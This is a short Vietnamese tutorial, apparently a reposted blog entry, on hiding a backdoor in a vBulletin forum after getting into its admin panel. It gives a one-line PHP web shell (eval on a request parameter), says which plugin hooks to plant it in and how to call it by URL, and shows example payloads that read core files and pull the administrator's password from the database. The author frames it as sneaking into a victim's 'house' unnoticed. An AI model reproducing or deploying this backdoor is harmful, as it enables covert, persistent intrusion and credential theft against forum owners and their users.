Skip to main content

Chèn Backdoor vào VBB nhanh-gọn-nhẹ-hiệu quả

Hello, hnay DuyK sẽ hướng dẫn các bạn cách chèn 1 “cửa sau” vào VBB nhanh-gọn-nhẹ-hiệu quả:
Khi bạn đã login vào được admincp của 1 forum vbb nào đó, bạn muốn để lại 1 “cửa sau” trên website này 1 cách kín đáo nhất ?

Okê, chỉ cần 1 dòng đơn giản:
eval($_REQUEST['dct']);
Đầu tiên bạn cần truy cập vào: Plugin & product manager => Plugin manager => Tìm đến 1 plugin bất kì => EDIT => chèn dòng trên vào vị trí hợp lý (Nếu không hiểu lắm về cấu trúc php thì bạn có thể chèn vào đầu hoặc cuối)
Bạn cần chú ý vào “HOOK” mà bạn chèn. Bạn nào hiểu phần này thì okê rồi. Còn nếu bạn nào chưa hiểu thì hãy chọn những kái nào có hook là:
ajax_start => Sau khi chèn chỉ việc truy cập /forum_path/ajax.php?dct=(Code php)
global_start (ko biết có nhớ lộn ko) => Sau khi chèn chỉ việc truy cập /forum_path/forum.php?dct=(Code php) — (Hoặc có thể run bất kì file php nào, vì chèn vào global mà)
……………..Blah blah……………..
Code php bạn có thể chèn truy vấn SQL, readfile….
Ví dụ
?dct=$duyk=readfile(‘includes/class_core.php’); echo $duyk; => view file class_core.php
?dct=$duyk=mysql_fetch_array(mysql_query(“select password from user where userid=1″)); echo $duyk['password'];
……………..
Demo:


Với việc chèn “Cửa hậu” nhỏ gọn như vậy nhưng rất hiệu quả :D Bằng cách này chúng ta có 1 cửa cho riêng mình để vào “nhà” của victim 1 cách lén lút nhất
Nguồn: DaiCa.info

Share